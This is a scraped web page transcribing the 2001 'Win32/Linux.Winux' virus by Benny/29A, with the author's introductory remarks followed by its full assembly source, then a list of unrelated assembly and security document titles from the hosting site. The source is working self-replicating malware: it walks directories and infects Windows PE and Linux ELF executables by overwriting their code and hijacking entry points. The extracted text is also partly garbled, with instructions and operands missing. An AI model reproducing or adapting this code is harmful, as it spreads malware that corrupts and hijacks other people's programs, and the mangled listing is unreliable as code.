Win32.Winux.txt Wed Nov 21 13:30: ; ; : Win32/Linux.Winux : ; ; : by Benny/29A : ;
|
|
- Karin Berry
- 8 years ago
- Views:
Transcription
1 Win32.Winux.txt Wed Nov 21 13:30: : Win32/Linux.Winux : : by Benny/29A : Heya ppl, lemme introduce you my first multi-platform virus, the worlds first PE/ELF infector. The idea of first Win32/Linux virus came to my head when I was learning Linux viruses. I m not Linux expert, I couldn t code for Linux in assembler - I am familiar with Intel syntax, AT&T is a bit chaotic for me. However, I decided to learn more about Linux coding and left my place of newbee. I was always fascinated of Linux scene and low-level programming under Linux but I never knew much about it. I wanted to code virus for Linux and learn from it. But becoz there already exist some viruses and I knew I won t be able to bring any new technique, I decided to code something unique -> Win32/Linux compatible multi-platform infector. And here you can find the result of my trying. Now, after all, I ve got some valuable experiencez and I m glad for that. Coding/debugging in Linux was hard for me, but I had fun and I learned a lot. And that s the most important. - Technical details - The virus itself ain t much. It s not big, it s not complicated, it s not resident nor polymorphic.. I wanted to be the virus like this. Just to show something new, show that something never seen before is possible and how can it be coded. The virus is devided to two partz: Win32 part and Linux part. Every part is able to infect both of PE and ELF filez. This source is designed to be compiled by TASM under Win32, nevertheless it can infect Linux programz and so then it will be able to be executed in Linux environment (and there it is also able to infect Win32 part, which can be executed in Win32 environment etc etc etc...). Win32 part: Virus infects PE filez by overwritting.reloc section, so it does not enlarge host file size. Filez that don t have.reloc section, big enough for virus code, can t be infected (explorer.exe can be used to test infection capabilities). It can pass thru directory tree by well known "dotdot" method ("cd..") and there infects all PE and ELF filez - virus does not check extensionz, it analyses victim s internal format and then decidez whata do. When all filez are passed and/or infected virus will execute host code. Linux part: Virus infects ELF filez by overwritting host code by viral code. The original host code is stored at the end of host file. It can infect all filez (both of PE and ELF) in current directory, also without checking file extensionz. When all filez are passed and/or infected virus will restore host code (overwrite itself by original host code) and execute it. Well, you are probably asking how it is possible that virus can infect Win32 appz from Linux environment and Linux appz from Win32 environment. Yeah, many ppl already asked me. For instance, under some emulator. There exist some emulatorz (win4lin, wine etc..) which are often used to execute Win32 appz under Linux. Also, I know many ppl that have partition specially
2 Win32.Winux.txt Wed Nov 21 13:30: reserved for CD burning, where they store both of Win32 and Linux programz. Virus executed from there has no problemz with infection, heh ) Does this virus work? Heh, sure it does. I tested it on Win98, Win2000 and RedHat 7.0, and it worked without any problemz. However, if you will find any problemz, don t by shy and send me a bug report -P - Licence agreement - This virus is covered by GPL - GNU General Public Licence. All crucial facts can be found there. Read it before using! - Last notez - While I was finishing Universe and coding Winux, many personal thingz happened to me. Again such depressive season as only winter can be fell down on me.. I m finishing my high-school, last year, many examz (and I know nothing, you know that feeling, heh :) etc. End of next stage of my life is getting closer and I don t know how will that next one be for me, what it will take and bring to me. I m looking forward to summer, the best season in the year, no depression, no school, no fucking problemz I still have and can t hold them all.. c ya l8r, somewhere in timespace : Benny / 29A +-+ : benny@post.cz (c) March, 2001 : : Czech Republic p.model flat include win32api.inc include useful.inc include mz.inc include pe.inc.data db?.code Start: setup SEH frame call gdelta gdelta: pop ebp ebp=delta offset call get_base get K32 base address call get_apis find addresses of APIz lea call f_infect: eax,[ebp + prev_dir - gdelta] eax MAX_PATH [ebp + a_getcurrentdirectorya - gdelta] get current directory 20 pop ecx 20 passes in directory tree ecx
3 Win32.Winux.txt Wed Nov 21 13:30: direct action - infect all PE filez in directory lea esi,[ebp + WFD - gdelta] WIN32_FIND_DATA structure esi save its *.* search for all filez call [ebp + a_findfirstfilea - gdelta] find first file inc eax je e_find quit if not found dec eax eax save search handle to stack f_next: call wcheckinfect infect found file esi save WFD structure dword ptr [esp+4] and search handle from stack call [ebp + a_findnextfilea - gdelta]find next file test eax,eax jne f_next and infect it f_close:call [ebp + a_findclose - gdelta] close search handle mov esi,[ebp + a_setcurrentdirectorya - gdelta] call esi go upper in directory tree pop ecx loop f_infect and again.. lea eax,[ebp + prev_dir - gdelta] eax call esi go back to original directory remove SEH frame extrn ExitProcess mov eax,offset ExitProcess h original_ep = dword ptr $-4 add eax,400000h image_base = dword ptr $-4 jmp eax and go back to host program INFECT FILE (Win32 version) wcheckinfect Proc setup SEH frame and dword ptr [ebp + sucelf - gdelta],0 test [esi.wfd_dwfileattributes], FILE_ATTRIBUTE_DIRECTORY jne end_seh discard directory entries xor ecx,ecx cmp [esi.wfd_nfilesizehigh],ecx jne end_seh discard files >4GB mov eax,[esi.wfd_nfilesizelow] cmp eax,4000h jb end_seh discard small filez mov [ebp + l_lseek - gdelta],eax xor lea call inc eax,eax eax FILE_ATTRIBUTE_NORMAL OPEN_EXISTING eax eax GENERIC_READ or GENERIC_WRITE eax,[esi.wfd_szfilename] eax [ebp + a_createfilea - gdelta] open file eax
4 Win32.Winux.txt Wed Nov 21 13:30: je end_seh dec eax mov [ebp + hfile - gdelta],eax cdq call cdq xchg jecxz mov edx edx edx PAGE_READWRITE edx eax [ebp + a_createfilemappinga - gdelta] eax,ecx end_cfma [ebp + hmapfile - gdelta],ecx edx edx edx FILE_MAP_WRITE ecx map file to address space call [ebp + a_mapviewoffile - gdelta] xchg eax,ecx jecxz end_mvof mov [ebp + lpfile - gdelta],ecx jmp n_fileopen close_file: h lpfile = dword ptr $-4 unmap file call [ebp + a_unmapviewoffile - gdelta] end_mvof: h hmapfile = dword ptr $-4 call [ebp + a_closehandle - gdelta] end_cfma: mov ecx, h was it linux program (ELF)? sucelf = dword ptr $-4 jecxz c_close no, close that file call dword ptr [ebp + hfile - gdelta] [ebp + a_setfilepointer - gdelta] go to EOF 0 lea eax,[ebp + sucelf - gdelta] eax virtual_end-start h a_mem = dword ptr $-4 dword ptr [ebp + hfile - gdelta] call [ebp + a_writefile - gdelta] write there orig. program part MEM_RELEASE 0 dword ptr [ebp + a_mem - gdelta] call [ebp + a_virtualfree - gdelta] and deallocate used memory c_close: h hfile = dword ptr $-4 call [ebp + a_closehandle - gdelta] close file jmp end_seh and quit n_fileopen: call check_elf
5 Win32.Winux.txt Wed Nov 21 13:30: je winfectelf is it Linux program (ELF)? add ax,-image_dos_signature jne close_file call check_pe jne close_file is it Win32 program (PE)? important chex cmp word ptr [esi.nt_fileheader.fh_machine],image_file_machine_i386 jne close_file mov ax,[esi.nt_fileheader.fh_characteristics] test ax,image_file_executable_image je close_file test ax,image_file_dll jne close_file test ax,image_file_system jne close_file mov al,byte ptr [esi.nt_fileheader.oh_subsystem] test al,image_subsystem_native jne close_file movzx eax,word ptr [esi.nt_fileheader.fh_numberofsections] dec eax test eax,eax je close_file call header&relocs get PE headerz and check for relocs je close_file quit if no relocs mov ebx,[edi.sh_virtualaddress] cmp eax,ebx jne close_file cmp [edi.sh_sizeofrawdata],virus_end-start+500 jb close_file is it large enough? ad xor mov stosd stosd eax,eax edi,edx erase relocs record call set_alignz align section variable dword ptr [ebp + original_ep - gdelta] dword ptr [ebp + image_base - gdelta] save used variablez mov eax,[esi.nt_optionalheader.oh_addressofentrypoint] mov [esi.nt_optionalheader.oh_addressofentrypoint],ebx mov [ebp + original_ep - gdelta],eax mov eax,[esi.nt_optionalheader.oh_imagebase] mov [ebp + image_base - gdelta],eax set variablez ad mov edi,[edi.sh_pointertorawdata] add edi,[ebp + lpfile - gdelta] lea esi,[ebp + Start - gdelta] mov ecx,virus_end-start rep movsb overwrite relocs by virus body pop dword ptr [ebp + image_base - gdelta] pop dword ptr [ebp + original_ep - gdelta] restore used variablez or dword ptr [edi.sh_characteristics],image_scn_mem_write jmp close_file set flag and quit wcheckinfect EndP INFECT LINUX PROGRAM (Win32 version) winfectelf Proc mov edi,ecx movzx eax,word ptr [edi+12h] cmp eax,3
6 Win32.Winux.txt Wed Nov 21 13:30: jne close_file call get_elf get elf headerz p_sectionz: mov eax,[esi+0ch] virtual address add eax,[esi+14h] virtual size cmp ebx,eax jb got_section does EP fit to this section? add esi,edx no, get to next record loop p_sectionz ECX-timez jmp close_file invalid ELF, quit got_section: mov eax,[ebp + Start - gdelta] mov ecx,[esi+10h] add ecx,edi cmp [ecx],eax je close_file infection check mov eax,[esi+14h] cmp eax,virtual_end-start jb close_file must be large enough PAGE_READWRITE MEM_RESERVE or MEM_COMMIT eax 0 call [ebp + a_virtualalloc - gdelta] test eax,eax allocate buffer for host code je close_file mov [ebp + a_mem - gdelta],eax ad mov ecx,[esi+14h] mov esi,[esi+10h] add esi,edi esi xchg eax,edi rep movsb copy host code to our buffer pop edi lea esi,[ebp + Start - gdelta] mov ecx,virtual_end-start rep movsb overwrite host code by virus body add dword ptr [edi+18h],linuxstart-start mov [ebp + sucelf - gdelta],edi jmp close_file set semaphore and quit winfectelf EndP this procedure can rieve API addresses get_apis Proc lea esi,[ebp + crc32s - gdelta] get ptr to CRC32 values of APIs lea edi,[ebp + a_apis - gdelta] where to store API addresses crc32c how many APIs do we need pop ecx in ECX... g_apis: eax save K32 base call get_api stosd save address test eax,eax je q_gpa quit if not found add esi,4 move to next CRC32 value loop g_apis search for API addresses in a loop end_seh:@seh_removeframe remove SEH frame
7 Win32.Winux.txt Wed Nov 21 13:30: restore all registers and quit from procedure jmp end_host quit if error get_apis EndP this procedure can rieve address of given API get_api Proc ad store all setup SEH frame mov edi,[eax.mz_lfanew] move to PE header add edi,eax... mov ecx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_size] jecxz end_gpa quit if no exports mov ebx,eax add ebx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddres s] mov edx,eax get address of export table add edx,[ebx.ed_addressofnames] address of API names mov ecx,[ebx.ed_numberofnames] number of API names mov edi,edx dword ptr [esi] save CRC32 to stack mov ebp,eax xor eax,eax APIname: eax mov esi,ebp get base add esi,[edx+eax*4] move to API name esi save go to the end of string sub esi,[esp] get string size mov edi,esi move it to EDI pop esi restore address of API name call CRC32 calculate CRC32 of API name cmp eax,[esp+4] is it right API? je g_name yeah, we got it inc eax increment counter loop APIname and search for next API name end_gpa:xor eax, eax set flag remove SEH frame mov [esp.pushad_eax],eax save value to stack restore all registers quit from procedure g_name: pop edx mov edx,ebp add edx,[ebx.ed_addressofordinals] movzx eax,word ptr [edx+eax*2] cmp eax,[ebx.ed_numberoffunctions] jae end_gpa-1 mov edx,ebp base of K32 add edx,[ebx.ed_addressoffunctions] address of API functions add ebp,[edx+eax*4] get API function address xchg eax,ebp we got address of API in EAX jmp ok_gpa quit get_api EndP this procedure can rieve base address of K32 get_base Proc ebp store EBP call gdlt get delta offset gdlt: pop ebp to EBP mov eax, h get lastly used address last_kern = dword ptr $-4 call check_kern is this address valid?
8 Win32.Winux.txt Wed Nov 21 13:30: jecxz end_gb yeah, we got the address call gb_table jump over the address table dd 077E00000h NT/W2k dd 077E80000h NT/W2k dd 077ED0000h NT/W2k dd 077F00000h NT/W2k dd 0BFF70000h 95/98 gb_table: pop edi get pointer to address table 4 get number of items in the table pop esi to ESI gbloop: mov eax,[edi+esi*4] get item call check_kern is address valid? jecxz end_gb yeah, we got the valid address dec esi decrement ESI test esi,esi end of table? jne gbloop nope, try next item call scan_kern scan the address space for K32 end_gb: pop ebp restore EBP quit check_kern: check if K32 address is valid mov ecx,eax make ECX!= 0 ad store all setup SEH frame movzx edx,word ptr [eax] get two bytes add edx,-"zm" is it MZ header? jne end_ck nope mov ebx,[eax.mz_lfanew] get pointer to PE header add ebx,eax normalize it mov ebx,[ebx] get four bytes add ebx,-"ep" is it PE header? jne end_ck nope xor ecx,ecx we got K32 base address mov [ebp + last_kern - gdlt],eax save K32 base address remove SEH frame mov [esp.pushad_ecx],ecx save ECX restore all registers if ECX == 0, address was found SEH_hndlr macro macro for remove SEH frame restore all registers add dword ptr [ebp + baddr - gdlt],1000h explore next page jmp bck continue execution endm scan_kern: scan address space for K32 bck: ad store all setup SEH frame mov eax, h starting/last address baddr = dword ptr $-4 movzx edx,word ptr [eax] get two bytes add edx,-"zm" is it MZ header? jne pg_flt nope mov edi,[eax.mz_lfanew] get pointer to PE header add edi,eax normalize it mov ebx,[edi] get four bytes add ebx,-"ep" is it PE header? jne pg_flt nope mov ebx,eax mov esi,eax add ebx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddres s] add esi,[ebx.ed_name] mov esi,[esi] add esi,- NREK je end_sk
9 Win32.Winux.txt Wed Nov 21 13:30: pg_flt: xor ecx,ecx we got K32 base address mov [ecx],esi generate PAGE FAULT! search again... end_sk: mov [ebp + last_kern - gdlt],eax save K32 base remove SEH frame mov [esp.pushad_eax],eax save EAX - K32 base get_base EndP restore all registers CRC32: ecx procedure for calculating CRC32s edx at run-time ebx xor ecx,ecx dec ecx mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec edi jne NextByteCRC not edx not ecx pop ebx mov eax,edx rol eax,16 mov ax,cx pop edx pop ecx signature db 0, [Win32/Linux.Winux] multi-platform virus by Benny/29A,0 little signature of mine -) Viral entrypoint in Linux programz LinuxStart: eax reserve variable for urn to host ad mov ebx,[esp.cpushad+8] get command line call lgdelta lgdelta:pop ebp ebp=delta offset mov ecx,end_end_lhost-end_lhost sub esp,ecx mov edi,esp lea esi,[ebp + end_lhost - lgdelta] rep movsb copy virus to stack and jump there jmp esp (becoz we need to restore host code back) end_lhost Proc ebx 125
10 Win32.Winux.txt Wed Nov 21 13:30: lea ebx,[ebp + Start - lgdelta] and ebx,0fffff000h mov ecx,3000h mov edx,7 int 80h deprotect code section pop ebx 5 xor ecx,ecx int 80h open host file xchg eax,ebx test ebx,ebx jns read_host q_host: xor eax,eax inc eax -1 pop ebx int 80h quit if error read_host: 19 mov ecx, h l_lseek = dword ptr $-4 cdq int 80h seek to saved host code (EOF - some bytez) test eax,eax js q_host ad 5 call cur_dir db.,0 cur_dir:pop ebx xor ecx,ecx cdq int 80h get current directory descriptor xchg eax,ebx inf_dir: 89 lea ecx,[ebp + WFD - lgdelta] int 80h get file from directory xchg eax,ecx jecxz cldir no more filez.. add eax,10 call lcheckinfect try to infect it jmp inf_dir and look for another file cldir: 6 int 80h close directory descriptor 3 lea ecx,[ebp + Start - lgdelta] mov edi,ecx mov edx,virtual_end-start int 80h restore host code test eax,eax js q_host 6 int 80h close host file descriptor add esp,end_end_lhost-end_lhost mov [esp.cpushad],edi write host entrypoint address
11 Win32.Winux.txt Wed Nov 21 13:30: and jump to there INFECT FILE (Linux version) lcheckinfect Proc ad xchg eax,ebx 5 cdq inc edx inc edx mov ecx,edx int 80h open file xchg eax,ebx test ebx,ebx jns c_open c_open: mov [ebp + f_handle - lgdelta],ebx 19 xor ecx,ecx int 80h seek to EOF = get file size mov [ebp + l_lseek - lgdelta],eax save it ecx ebx inc ecx ecx inc ecx inc ecx ecx eax xor ecx,ecx ecx mov ebx,esp 90 int 80h map file to address space add esp,24 cmp eax,0fffff000h jbe c_mmap quit if error jmp c_file c_mmap: mov ecx,eax mov [ebp + fm_handle - lgdelta],eax ad call check_elf je linfectelf is it Linux program (ELF)? add ax,-image_dos_signature jne c_mfile call check_pe jne c_mfile is it Win32 program (PE)? some important chex cmp word ptr [esi.nt_fileheader.fh_machine],image_file_machine_i386 jne c_mfile mov ax,[esi.nt_fileheader.fh_characteristics] test ax,image_file_executable_image je c_mfile test ax,image_file_dll jne c_mfile test ax,image_file_system jne c_mfile mov al,byte ptr [esi.nt_fileheader.oh_subsystem] test al,image_subsystem_native jne c_mfile
12 Win32.Winux.txt Wed Nov 21 13:30: movzx eax,word ptr [esi.nt_fileheader.fh_numberofsections] dec eax test eax,eax je c_mfile call header&relocs get PE headerz and check for relocs je c_mfile quit if no relocs mov ebx,[edi.sh_virtualaddress] cmp eax,ebx jne c_mfile cmp [edi.sh_sizeofrawdata],virus_end-start+500 jb c_mfile is it large enough? ad xor mov stosd stosd eax,eax edi,edx clear relocs record call set_alignz align section variable mov eax,[esi.nt_optionalheader.oh_addressofentrypoint] mov [esi.nt_optionalheader.oh_addressofentrypoint],ebx mov [ebp + original_ep - lgdelta],eax mov eax,[esi.nt_optionalheader.oh_imagebase] mov [ebp + image_base - lgdelta],eax set some important variablez ad mov edi,[edi.sh_pointertorawdata] add edi,[esp+24] lea esi,[ebp + Start - lgdelta] mov ecx,virus_end-start rep movsb overwrite relocs by virus code or dword ptr [edi.sh_characteristics],image_scn_mem_write set flag c_mfile: 91 int 80h unmap file c_file: 6 mov ebx,[ebp + f_handle - lgdelta] int 80h close file descriptor and quit lcheckinfect EndP INFECT LINUX PROGRAM (Linux version) linfectelf Proc mov edi,ecx movzx eax,word ptr [edi+12h] cmp eax,3 jne c_mfile call get_elf get ELF headerz p_sectionz2: mov eax,[esi+0ch] virtual address add eax,[esi+14h] virtual size cmp ebx,eax jb got_section2 does EP fit to this section? add esi,edx no, get to next record loop p_sectionz2 ECX-timez jmp c_mfile invalid ELF, quit got_section2: mov eax,[ebp + Start - lgdelta]
13 Win32.Winux.txt Wed Nov 21 13:30: mov ecx,[esi+10h] add ecx,edi cmp [ecx],eax je c_mfile infection check mov eax,[esi+14h] cmp eax,virtual_end-start jb c_mfile is it large enough? sub esp,eax create buffer in stack mov [ebp + s_mem - lgdelta],eax add dword ptr [edi+18h],linuxstart-start mov ecx,[esi+14h] mov esi,[esi+10h] add esi,edi mov eax,esi mov edi,esp rep movsb copy original host code there mov edi,eax lea esi,[ebp + Start - lgdelta] mov ecx,virtual_end-start rep movsb overwrite host code by virus 91 mov ebx,[ebp + fm_handle - lgdelta] int 80h unmap file 19 mov ebx,[ebp + f_handle - lgdelta] xor ecx,ecx cdq inc edx inc edx int 80h go to EOF 4 mov ecx,esp mov edx,virtual_end-start int 80h write there original host code add esp,[ebp + s_mem - lgdelta] correct stack jmp c_file and close the file linfectelf EndP check if it is Linux program (ELF) check_elf Proc mov eax,[ecx] eax add eax,-464c457fh check_elf EndP check if it is Win32 program (PE) check_pe Proc mov eax,[ecx.mz_lfanew] add eax,ecx xchg eax,esi mov eax,[esi] add eax,-image_nt_signature check_pe EndP
14 Win32.Winux.txt Wed Nov 21 13:30: get some variablez and check for relocationz in PE file header&relocs Proc imul eax,eax,image_sizeof_section_header movzx edx,word ptr [esi.nt_fileheader.fh_sizeofoptionalheader] lea edi,[eax+edx+image_sizeof_file_header+4] add edi,esi lea edx,[esi.nt_optionalheader.oh_datadirectory.de_basereloc.dd_virtualaddres s] mov eax,[edx] test eax,eax header&relocs EndP align section variable set_alignz Proc mov eax,virtual_end-start cmp eax,[edi.sh_virtualsize] jb o_vs mov ecx,[esi.nt_optionalheader.oh_sectionalignment] cdq div ecx test edx,edx je o_al inc eax o_al: mul ecx mov [edi.sh_virtualsize],eax o_vs: set_alignz EndP get some important variablez from Linux program (ELF) get_elf Proc mov ebx,[edi+18h] EP mov esi,[edi+20h] section header add esi,edi normalize movzx edx,word ptr [edi+2eh] size of section header movzx ecx,word ptr [edi+30h] number of sectionz get_elf EndP end_end_lhost: end_lhost EndP gpl db This GNU program is covered by GPL.,0 licence agreement -) CRC32s of used APIz crc32s: dd 0AE17EBEFh FindFirstFileA dd 0AA700106h FindNextFileA dd 0C200BE21h FindClose dd 08C892DDFh CreateFileA dd 096B2D96Ch CreateFileMappingA dd 0797B49ECh MapViewOfFile dd B42h UnmapViewOfFile dd A9Dh CloseHandle dd Eh VirtualAlloc dd 02AAD1211h VirtualFree dd h WriteFile dd D42h SetFilePointer dd 0EBC6C18Bh GetCurrentDirectoryA dd 0B2DBD7DCh SetCurrentDirectoryA dd 07495B3ADh OutputDebugStringA crc32c = ($-crc32s)/4 number of APIz virus_end:
15 Win32.Winux.txt Wed Nov 21 13:30: addresses of APIz a_apis: a_findfirstfilea dd? a_findnextfilea dd? a_findclose dd? a_createfilea dd? a_createfilemappinga dd? a_mapviewoffile dd? a_unmapviewoffile dd? a_closehandle dd? a_virtualalloc dd? a_virtualfree dd? a_writefile dd? a_setfilepointer dd? a_getcurrentdirectorya dd? a_setcurrentdirectorya dd? a_outputdebugstringa dd? f_handle dd? file handle fm_handle dd? file mapping handle s_mem dd? size of host code (for stack manipulatio nz) WFD WIN32_FIND_DATA? WIN32_FIND_DATA structure prev_dir db MAX_PATH dup (?)original directory virtual_end: ends End Start that s all folx, wasn t that kewl? -)
Analysis of Win32.Scream
Analysis of Win32.Scream 1. Introduction Scream is a very interesting virus as it combines a lot of techniques written inside of it. In this paper I ll cover all of its features and internals. I ll dissect
More informationTitanMist: Your First Step to Reversing Nirvana TitanMist. mist.reversinglabs.com
TitanMist: Your First Step to Reversing Nirvana TitanMist mist.reversinglabs.com Contents Introduction to TitanEngine.. 3 Introduction to TitanMist 4 Creating an unpacker for TitanMist.. 5 References and
More informationDisassembly of False Positives for Microsoft Word under SCRAP
Disassembly of False Positives for Microsoft Word under SCRAP We evaluated Word application of Microsoft Office 2010 Suite using a 54 KiB document [1] under the SCRAP configuration S 7,4 for one billion
More informationSystems Design & Programming Data Movement Instructions. Intel Assembly
Intel Assembly Data Movement Instruction: mov (covered already) push, pop lea (mov and offset) lds, les, lfs, lgs, lss movs, lods, stos ins, outs xchg, xlat lahf, sahf (not covered) in, out movsx, movzx
More informationComputer Organization and Assembly Language
Computer Organization and Assembly Language Lecture 8 - Strings and Arrays Introduction We already know that assembly code will execute significantly faster than code written in a higher-level language
More informationCS412/CS413. Introduction to Compilers Tim Teitelbaum. Lecture 20: Stack Frames 7 March 08
CS412/CS413 Introduction to Compilers Tim Teitelbaum Lecture 20: Stack Frames 7 March 08 CS 412/413 Spring 2008 Introduction to Compilers 1 Where We Are Source code if (b == 0) a = b; Low-level IR code
More informationA Tiny Guide to Programming in 32-bit x86 Assembly Language
CS308, Spring 1999 A Tiny Guide to Programming in 32-bit x86 Assembly Language by Adam Ferrari, ferrari@virginia.edu (with changes by Alan Batson, batson@virginia.edu and Mike Lack, mnl3j@virginia.edu)
More informationComplete 8086 instruction set
Page 1 of 53 Complete 8086 instruction set Quick reference: AAA AAD AAM AAS ADC ADD AND CALL CBW CLC CLD CLI CMC CMP CMPSB CMPSW CWD DAA DAS DEC DIV HLT IDIV IMUL IN INC INT INTO I JA JAE JB JBE JC JCXZ
More information64-Bit NASM Notes. Invoking 64-Bit NASM
64-Bit NASM Notes The transition from 32- to 64-bit architectures is no joke, as anyone who has wrestled with 32/64 bit incompatibilities will attest We note here some key differences between 32- and 64-bit
More informationFighting malware on your own
Fighting malware on your own Vitaliy Kamlyuk Senior Virus Analyst Kaspersky Lab Vitaly.Kamluk@kaspersky.com Why fight malware on your own? 5 reasons: 1. Touch 100% of protection yourself 2. Be prepared
More informationAbysssec Research. 1) Advisory information. 2) Vulnerable version
Abysssec Research 1) Advisory information Title Version Discovery Vendor Impact Contact Twitter CVE : Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability : QuickTime player 7.6.5
More informationOpenBSD Remote Exploit
OpenBSD Remote Exploit Only two remote holes in the default install Alfredo Ortega, Gerardo Richarte Core Security April 2007 Abstract OpenBSD is regarded as a very secure Operating System. This article
More informationAbysssec Research. 1) Advisory information. 2) Vulnerable version
Abysssec Research 1) Advisory information Title Version Analysis Vendor Impact Contact Twitter CVE : Microsoft MPEG Layer- 3 Audio Stack Based Overflow : l3codeca.acm (XP SP2 XP SP3) : http://www.abysssec.com
More informationREpsych. : psycholigical warfare in reverse engineering. def con 2015 // domas
REpsych : psycholigical warfare in reverse engineering { def con 2015 // domas Warning This serves no purpose Taking something apart to figure out how it works With software Interfacing Documentation Obsolescence
More informationSoftware Fingerprinting for Automated Malicious Code Analysis
Software Fingerprinting for Automated Malicious Code Analysis Philippe Charland Mission Critical Cyber Security Section October 25, 2012 Terms of Release: This document is approved for release to Defence
More informationThe Beast is Resting in Your Memory On Return-Oriented Programming Attacks and Mitigation Techniques To appear at USENIX Security & BlackHat USA, 2014
Intelligent Things, Vehicles and Factories: Intel Workshop on Cyberphysical and Mobile Security 2014, Darmstadt, June 11 The Beast is Resting in Your Memory On Return-Oriented Programming Attacks and Mitigation
More informationMachine-Level Programming II: Arithmetic & Control
Mellon Machine-Level Programming II: Arithmetic & Control 15-213 / 18-213: Introduction to Computer Systems 6 th Lecture, Jan 29, 2015 Instructors: Seth Copen Goldstein, Franz Franchetti, Greg Kesden 1
More informationFor a 64-bit system. I - Presentation Of The Shellcode
#How To Create Your Own Shellcode On Arch Linux? #Author : N3td3v!l #Contact-mail : 4nonymouse@usa.com #Website : Nopotm.ir #Spcial tnx to : C0nn3ct0r And All Honest Hackerz and Security Managers I - Presentation
More informationHacking Techniques & Intrusion Detection. Ali Al-Shemery arabnix [at] gmail
Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail All materials is licensed under a Creative Commons Share Alike license http://creativecommonsorg/licenses/by-sa/30/ # whoami Ali
More informationAssembly Language: Function Calls" Jennifer Rexford!
Assembly Language: Function Calls" Jennifer Rexford! 1 Goals of this Lecture" Function call problems:! Calling and returning! Passing parameters! Storing local variables! Handling registers without interference!
More informationBuffer Overflows. Security 2011
Buffer Overflows Security 2011 Memory Organiza;on Topics Kernel organizes memory in pages Typically 4k bytes Processes operate in a Virtual Memory Space Mapped to real 4k pages Could live in RAM or be
More informationReturn-oriented programming without returns
Faculty of Computer Science Institute for System Architecture, Operating Systems Group Return-oriented programming without urns S. Checkoway, L. Davi, A. Dmitrienko, A. Sadeghi, H. Shacham, M. Winandy
More informationA Museum of API Obfuscation on Win32
A Museum of API Obfuscation on Win32 Masaki Suenaga Senior Software Engineer Contents Abstract... 1 File Image vs. Memory Image... 2 API Analysis... 4 Generating Memory Dumps... 5 Runtime API Address Resolution...
More informationOff-by-One exploitation tutorial
Off-by-One exploitation tutorial By Saif El-Sherei www.elsherei.com Introduction: I decided to get a bit more into Linux exploitation, so I thought it would be nice if I document this as a good friend
More informationAttacking x86 Windows Binaries by Jump Oriented Programming
Attacking x86 Windows Binaries by Jump Oriented Programming L. Erdődi * * Faculty of John von Neumann, Óbuda University, Budapest, Hungary erdodi.laszlo@nik.uni-obuda.hu Abstract Jump oriented programming
More informationOverview of IA-32 assembly programming. Lars Ailo Bongo University of Tromsø
Overview of IA-32 assembly programming Lars Ailo Bongo University of Tromsø Contents 1 Introduction... 2 2 IA-32 assembly programming... 3 2.1 Assembly Language Statements... 3 2.1 Modes...4 2.2 Registers...4
More informationCS 16: Assembly Language Programming for the IBM PC and Compatibles
CS 16: Assembly Language Programming for the IBM PC and Compatibles Start basic with some string primitive instructions Get choosy with some selected string procedures Look both ways before crossing two-dimensional
More informationTest Driven Development in Assembler a little story about growing software from nothing
Test Driven Development in Assembler a little story about growing software from nothing Olve Maudal During the last decade Test-Driven Development has become an established practice for developing software
More informationLecture 7: Machine-Level Programming I: Basics Mohamed Zahran (aka Z) mzahran@cs.nyu.edu http://www.mzahran.com
CSCI-UA.0201-003 Computer Systems Organization Lecture 7: Machine-Level Programming I: Basics Mohamed Zahran (aka Z) mzahran@cs.nyu.edu http://www.mzahran.com Some slides adapted (and slightly modified)
More informationUsing Heap Allocation in Intel Assembly Language
Using Heap Allocation in Intel Assembly Language Copyright 2005, Kip R. Irvine. All rights reserved. Dynamic memory allocation is a feature we take for granted in high-level languages such as C++ and Java.
More information8. MACROS, Modules, and Mouse
8. MACROS, Modules, and Mouse Background Macros, Modules and the Mouse is a combination of concepts that will introduce you to modular programming while learning how to interface with the mouse. Macros
More informationInstruction Set Architecture
CS:APP Chapter 4 Computer Architecture Instruction Set Architecture Randal E. Bryant adapted by Jason Fritts http://csapp.cs.cmu.edu CS:APP2e Hardware Architecture - using Y86 ISA For learning aspects
More informationSelf Protection Techniques in Malware
DSIE 10 5 th Doctoral lsymposium on Informatics Engineering i January 28 29, 2010 Porto, Portugal Self Protection Techniques in Malware Tiago Santos Overview Introduction Malware Types Why Self Protection?
More informationRemoving Sentinel SuperPro dongle from Applications and details on dongle way of cracking Shub-Nigurrath of ARTeam Version 1.
Removing Sentinel SuperPro dongle from Applications Shub-Nigurrath of ARTeam Version 1.0 September 2006 1. Abstract... 2 2. Possible approaches: emulations vs simulation... 3 2.1. How a dongle works...
More informationCS:APP Chapter 4 Computer Architecture Instruction Set Architecture. CS:APP2e
CS:APP Chapter 4 Computer Architecture Instruction Set Architecture CS:APP2e Instruction Set Architecture Assembly Language View Processor state Registers, memory, Instructions addl, pushl, ret, How instructions
More informationHeap-based Buffer Overflow Vulnerability in Adobe Flash Player
Analysis of Zero-Day Exploit_Issue 03 Heap-based Buffer Overflow Vulnerability in Adobe Flash Player CVE-2014-0556 20 December 2014 Table of Content Overview... 3 1. CVE-2014-0556 Vulnerability... 3 2.
More informationx64 Cheat Sheet Fall 2015
CS 33 Intro Computer Systems Doeppner x64 Cheat Sheet Fall 2015 1 x64 Registers x64 assembly code uses sixteen 64-bit registers. Additionally, the lower bytes of some of these registers may be accessed
More informationINTRODUCTION TO MALWARE & MALWARE ANALYSIS
INTRODUCTION TO MALWARE & MALWARE ANALYSIS by Quick Heal R&D lab Security Simplified INTRODUCTION Very often people call everything that corrupts their system a virus without being aware about what it
More information1. General function and functionality of the malware
1. General function and functionality of the malware The malware executes in a command shell, it begins by checking to see if the executing file contains the MZP file extension, and then continues to access
More informationHow Compilers Work. by Walter Bright. Digital Mars
How Compilers Work by Walter Bright Digital Mars Compilers I've Built D programming language C++ C Javascript Java A.B.E.L Compiler Compilers Regex Lex Yacc Spirit Do only the easiest part Not very customizable
More informationWindows Assembly Programming Tutorial
JEFF HUANG (huang6@uiuc.edu) December 10, 2003 Windows Assembly Programming Tutorial Version 1.02 Copyright 2003, Jeff Huang. All rights reserved. by Jeff Huang Table of Contents Introduction... 2 Why
